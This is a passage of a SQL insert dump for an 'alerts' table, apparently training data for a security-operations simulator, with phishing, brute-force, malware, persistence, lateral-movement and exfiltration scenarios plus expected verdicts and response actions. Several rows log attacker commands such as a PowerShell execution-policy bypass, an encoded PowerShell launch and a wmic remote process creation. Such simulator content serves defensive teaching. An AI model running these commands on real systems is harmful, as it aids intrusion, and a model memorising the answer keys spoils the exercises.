(316, 'Phishing Attempt Detected via Malicious Email', 'medium', 'Proofpoint', 'An email containing a malicious URL was received by user \'john.smith\'. The URL is associated with credential harvesting attacks.', 'Phishing', 'T1566', 1, 'investigating', 300, '{\"timestamp\":\"2026-01-02T08:47:30Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@fakebank.com\",\"username\":\"john.smith\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-02 14:22:02', '2026-03-14 23:55:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address is associated with recent phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing sites targeting user credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in an email suggests a phishing attack aimed at harvesting credentials.\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected via Malicious Email\",\"date\":\"2026-02-01T20:32:18.911Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(317, 'Suspicious Email Detected with Potential Phishing URL', 'medium', 'Proofpoint', 'An email was received from a suspicious sender with a URL known for phishing activities. The email appears to be a spoofed message attempting to trick users into clicking the malicious link.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-02T08:34:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"noreply@alerting-service.com\",\"domain\":\"alerting-service.com\",\"url\":\"http://malicious-phishing-link.com\",\"username\":\"john.doe\",\"hostname\":\"johns-pc\"}', '2026-01-02 11:43:28', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 23 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"alerting-service.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-phishing-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with ongoing phishing campaign\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known malicious URL and reports of phishing from the IP suggest this is a true positive.\"}', 'Beginner', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected with Potential Phishing URL\",\"date\":\"2026-02-01T20:32:18.912Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(318, 'Excessive Login Failures from Known Internal Host', 'low', 'Wazuh', 'Multiple failed login attempts were detected from an internal IP address. The activity was flagged due to a high number of failures, but the source is an internal, known host.', 'Brute Force', 'T1110', 0, 'Closed', 34, '{\"timestamp\":\"2026-01-02T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-server\",\"failed_attempts\":15}', '2026-01-02 19:25:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal network address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"clean\",\"details\":\"Commonly used internal admin account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originate from an internal IP address, indicating a potential misconfiguration or user error rather than a malicious attempt.\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(319, 'Suspicious Email Detected', 'high', 'Email Gateway', 'APT10 begins the attack by sending spear-phishing emails to key employees of TechGlobal Inc., enticing them to click on a malicious link disguised as a legitimate business document.', 'Phishing', 'T1566.001', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"email_id\":\"d3f4b5c6-7e89-4abc-de12-34567890fghj\",\"sender\":\"attacker@maliciousdomain.com\",\"recipient\":\"jane.doe@techglobal.com\",\"subject\":\"Important Business Document\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"url\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"smtp_server\":\"smtp.techglobal.com\"}', '2026-01-02 20:23:41', '2026-03-09 02:49:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address involved in multiple phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Inspection Service\",\"verdict\":\"malicious\",\"details\":\"URL is associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Name Patterns\",\"verdict\":\"suspicious\",\"details\":\"Common filename used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-02-01T20:32:18.914Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(320, 'Unauthorized Application Execution', 'high', 'EDR', 'Following successful credential harvesting, the attacker uses the compromised accounts to execute malware on the target network, enabling remote access and further exploitation.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:28:32Z\",\"event_id\":\"4624\",\"computer_name\":\"workstation-22.corp.local\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.57\",\"destination_ip\":\"10.0.0.45\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"malicious_script.ps1\",\"action\":\"Create Process\"}', '2026-01-02 20:23:41', '2026-03-09 02:51:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(321, 'Persistence Mechanism Installed', 'high', 'Endpoint Security Logs', 'APT10 installed a persistence mechanism via registry modifications and scheduled tasks on the endpoint, ensuring continued access to the compromised systems. Detection of suspicious registry changes and scheduled tasks was noted.', 'Persistence', 'T1547', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-23T14:37:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"filename\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"RegistryModification\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"process_name\":\"regedit.exe\"}', '2026-01-02 20:23:41', '2026-03-09 02:54:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"is_critical\":true,\"osint_result\":{\"source\":\"EndpointSecurity\",\"verdict\":\"malicious\",\"details\":\"Malicious scheduled task linked to persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(322, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With a foothold established, the attacker moves laterally within the network, using legitimate administrative tools to avoid detection while searching for valuable data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:25:36Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"192.168.1.150\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"admin_jdoe\",\"used_tool\":\"wmic\",\"command\":\"wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"detected_protocol\":\"SMB\",\"log_type\":\"network_traffic\"}', '2026-01-02 20:23:41', '2026-03-09 02:57:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of potential compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Known administrative account used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash of a tool commonly used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(323, 'Data Exfiltration Attempt', 'high', 'Firewall Logs', 'APT10 attempts to exfiltrate the gathered data using encrypted channels to evade detection by security mechanisms, completing their operation.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allow\",\"bytes_sent\":10485760,\"username\":\"internal_user\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filenames\":[\"confidential_data.zip\"],\"firewall_rule\":\"Allow_HTTPS_Traffic\",\"geo_location\":\"External - United States\",\"alerts\":[\"Large data transfer detected\",\"Suspicious outbound connection\"]}', '2026-01-02 20:23:41', '2026-03-09 02:59:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
